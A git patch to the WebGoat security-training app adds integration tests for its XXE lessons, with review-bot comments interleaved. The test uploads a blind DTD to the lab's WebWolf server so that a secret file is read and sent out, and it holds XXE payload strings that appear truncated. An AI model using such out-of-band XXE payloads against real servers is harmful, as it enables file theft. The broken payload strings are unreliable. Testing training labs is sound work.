From ec236a4ff527b92a9bf75d44f2e897359180d3db Mon Sep 17 00:00:00 2001
From: Rene Zubcevic
Date: Wed, 18 Sep 2019 14:48:34 +0200
Subject: [PATCH] First steps in XXE integration tests

---
 .../resources/application-webgoat.properties | 1 +
 .../org/owasp/webgoat/IntegrationTest.java | 11 +--
 .../test/java/org/owasp/webgoat/XXETest.java | 73 +++++++++++++++++++
 .../resources/application-inttest.properties | 6 ++
 .../webgoat/plugin/ContentTypeAssignment.java | 2 +-
 5 files changed, 87 insertions(+), 6 deletions(-)
 create mode 100644 webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
 create mode 100644 webgoat-integration-tests/src/test/resources/application-inttest.properties

diff --git a/webgoat-container/src/main/resources/application-webgoat.properties b/webgoat-container/src/main/resources/application-webgoat.properties
index 2346f3f30..76a3107e1 100644
--- a/webgoat-container/src/main/resources/application-webgoat.properties
+++ b/webgoat-container/src/main/resources/application-webgoat.properties
@@ -12,6 +12,7 @@ server.ssl.key-alias=${WEBGOAT_KEY_ALIAS:goat}
 server.ssl.enabled=${WEBGOAT_SSLENABLED:false}
 security.require-ssl=${WEBGOAT_SSLENABLED:false}
+hsqldb.port=${WEBGOAT_HSQLPORT:9001}
 spring.datasource.url=jdbc:hsqldb:hsql://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_HSQLPORT:9001}/webgoat
 spring.jpa.hibernate.ddl-auto=update
 spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
index 9114fcad1..d896b1c80 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
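Review bot: The new `hsqldb.port` line repeats the `${WEBGOAT_HSQLPORT:9001}` default that the `spring.datasource.url` line directly below already inlines, so the two definitions can drift apart when one is edited. Pointing the URL at the new property keeps a single source of truth: `spring.datasource.url=jdbc:hsqldb:hsql://${WEBGOAT_HOST:127.0.0.1}:${hsqldb.port}/webgoat`. Nothing in this hunk shows what consumes `hsqldb.port`, so a one-line comment naming its reader would help the next maintainer.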
@@ -21,12 +21,11 @@ import static io.restassured.RestAssured.given;
 public abstract class IntegrationTest {
- protected static int WG_PORT = 8080;
+ protected static int WG_PORT = 8081;
 protected static int WW_PORT = 9090;
 private static String WEBGOAT_URL = "http://127.0.0.1:" + WG_PORT + "/WebGoat/";
 private static String WEBWOLF_URL = "http://127.0.0.1:" + WW_PORT + "/";
- //This also allows to test the application with HTTPS when outside testing option is used
 protected static RestAssuredConfig restConfig = RestAssuredConfig.newConfig().sslConfig(new SSLConfig().relaxedHTTPSValidation());
@@ -41,16 +40,18 @@ public abstract class IntegrationTest {
 @BeforeClass
 public static void beforeAll() {
- if (!started) {
+
+ if (!started) {
 started = true;
 if (!isAlreadyRunning(WG_PORT)) {
 SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class)
- .properties(Map.of("spring.config.name", "application-webgoat", "WEBGOAT_PORT", WG_PORT));
+ .properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_PORT", WG_PORT));
 wgs.run();
+
 }
 if (!isAlreadyRunning(WW_PORT)) {
 SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class)
- .properties(Map.of("spring.config.name", "application-webwolf", "WEBWOLF_PORT", WW_PORT));
+ .properties(Map.of("spring.config.name", "application-webwolf,application-inttest", "WEBWOLF_PORT", WW_PORT));
 wws.run();
 }
 }
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
new file mode 100644
index 000000000..ab6e3350c
--- /dev/null
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
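Review bot: The removed comment above `restConfig` was the only explanation of why `relaxedHTTPSValidation()` switches off certificate checking for the test client, and the new side keeps the call but drops the rationale; restore it as `// relaxed TLS validation: lets the same tests run against an externally started HTTPS instance`. The change to `WG_PORT = 8081` is likewise undocumented; a comment such as `// 8081 avoids clashing with a developer's default WebGoat on 8080` records the intent (that motive is an inference — adjust if the reason differs). The enclosing class continues beyond this hunk.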
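Review bot: The two added blank lines in `beforeAll` (after `public static void beforeAll() {` and after `wgs.run();`) are whitespace-only and make the hunk noisier than the real edit, the `spring.config.name` lists; drop them. The `application-inttest` profile name is now spelled out in two string literals, so a `private static final String INTTEST_CONFIG = "application-inttest";` joined into both `Map.of` calls keeps them from diverging. Because the inttest overrides are applied only when `isAlreadyRunning` is false, a test that relies on the `target/` paths declared in that profile sees different directories when an instance is already listening; a comment at `if (!isAlreadyRunning(WG_PORT)) {` would make that precondition explicit. `beforeAll` ends inside this hunk, but the class continues past it.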
@@ -0,0 +1,73 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.nio.file.Paths;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.Assert;
+import org.junit.Test;
+
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+
+public class XXETest extends IntegrationTest {
+
+ private static final String xxe3 = "]>&xxe;test";
+ private static final String xxe4 = "]>&xxe;test";
+ private static final String dtd7 = "\">%all;";
+ private static final String xxe7 = "%remote;]>test&send;";
+
+ private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
+ private String webwolfFileDir = System.getProperty("user.dir").concat("/target/webwolf-fileserver");
+
+
+ @Test
+ public void runTests() throws IOException {
+ startLesson("XXE");
+
+ checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
+ checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
+ Path webWolfFilePath = Paths.get(webwolfFileDir);
+ if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
+ System.out.println("delete file");
+ Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
+ }
+ String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
+ String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile);
+ System.out.println(dtd7String);
+ RestAssured.given()
+ .when()
+ .config(restConfig)
+ .cookie("WEBWOLFSESSION", getWebWolfCookie())
+ .multiPart("file", "blind.dtd", dtd7String.getBytes())
+ .post(webWolfUrl("/WebWolf/fileupload"))
+ .then()
+ .extract().response().getBody().asString();
+
+
+ String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser());
+ System.out.println(xxe7String);
+ checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false
);
+
+ //checkResults("/XXE/");
+
+ }
+
+ public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
+ Assert.assertThat(
+ RestAssured.given()
+ .when()
+ .config(restConfig)
+ .contentType(contentType)
+ .cookie("JSESSIONID", getWebGoatCookie())
+ .body(body)
+ .post(url)
+ .then()
+ .log().all()
+ .statusCode(200)
+ .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+ }
+
+}
diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties
new file mode 100644
index 000000000..9c388c7ca
--- /dev/null
+++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties
@@ -0,0 +1,6 @@
+webgoat.user.directory=${user.dir}/target/.webgoat
+webgoat.server.directory=${user.dir}/target/.webgoat
+
+webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
+
+spring.jpa.hibernate.ddl-auto=create-drop
\ No newline at end of file
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
index 4cda99dd3..d89d17519 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
@@ -67,7 +67,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
 attackResult = failed().feedback("xxe.content.type.feedback.json").build();
 }
- if (MediaType.APPLICATION_XML_VALUE.equals(contentType)) {
+ if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
 String error = "";
 try {
 Comment comment = comments.parseXml(commentStr);
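Review bot: The WebWolf upload in `runTests` extracts the response body and throws it away, so a failed upload of `blind.dtd` (wrong cookie, missing user directory) goes unreported and the later blind-XXE assertion fails with an unrelated message; end the chain with `.statusCode(200)` instead of `.extract().response().getBody().asString()`. `dtd7String.getBytes()` uses the platform default charset, so pass `StandardCharsets.UTF_8` (add the `java.nio.charset.StandardCharsets` import) to make the uploaded DTD byte-identical on every build machine. The `exists()`/`Files.delete` pair computes the same path twice and collapses to `Files.deleteIfExists(...)`, while the `System.out.println` calls and the commented-out `//checkResults("/XXE/");` are debugging leftovers to remove. `webGoatHomeDirectory` and `webwolfFileDir` hard-code the `target/` paths that `application-inttest.properties` also declares, and `IntegrationTest.beforeAll` skips that profile when an instance is already running, so the test then silently targets the wrong directories — either read the values from the same property source or document that precondition on the two fields.
```java
        Path blindDtd = Paths.get(webwolfFileDir, getWebgoatUser(), "blind.dtd");
        Files.deleteIfExists(blindDtd);
        // … unchanged: secretFile / dtd7String construction …
        RestAssured.given()
                .when()
                .config(restConfig)
                .cookie("WEBWOLFSESSION", getWebWolfCookie())
                .multiPart("file", "blind.dtd", dtd7String.getBytes(StandardCharsets.UTF_8))
                .post(webWolfUrl("/WebWolf/fileupload"))
                .then()
                .statusCode(200);
        // … unchanged: xxe7String construction and the blind assignment check …
```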
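Review bot: `contentType.contains(MediaType.APPLICATION_XML_VALUE)` is a substring test, so any header that merely embeds `application/xml` somewhere (for example inside a parameter value) takes the XML branch, whereas the apparent goal is to accept a charset parameter such as `application/xml;charset=UTF-8`. Spring's parser expresses that intent and also tolerates whitespace and case: `if (contentType != null && MediaType.parseMediaType(contentType).isCompatibleWith(MediaType.APPLICATION_XML)) {`; note that `parseMediaType` throws `InvalidMediaTypeException` on a malformed header, which this endpoint would need to catch or treat as a failed attempt, and that `isCompatibleWith` also accepts wildcards like `*/*`, so compare type and subtype directly if those should not count. The Yoda form `null != contentType` reads less naturally than `contentType != null`. The enclosing method starts and ends outside the hunk.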